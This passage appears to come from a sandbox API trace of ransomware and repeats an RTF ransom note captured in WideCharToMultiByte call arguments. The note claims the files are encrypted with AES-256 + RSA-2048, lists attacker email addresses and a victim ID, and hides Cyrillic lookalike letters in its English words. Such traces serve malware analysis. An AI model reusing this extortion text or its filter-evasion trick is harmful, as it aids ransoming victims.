r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.485] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.485] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms 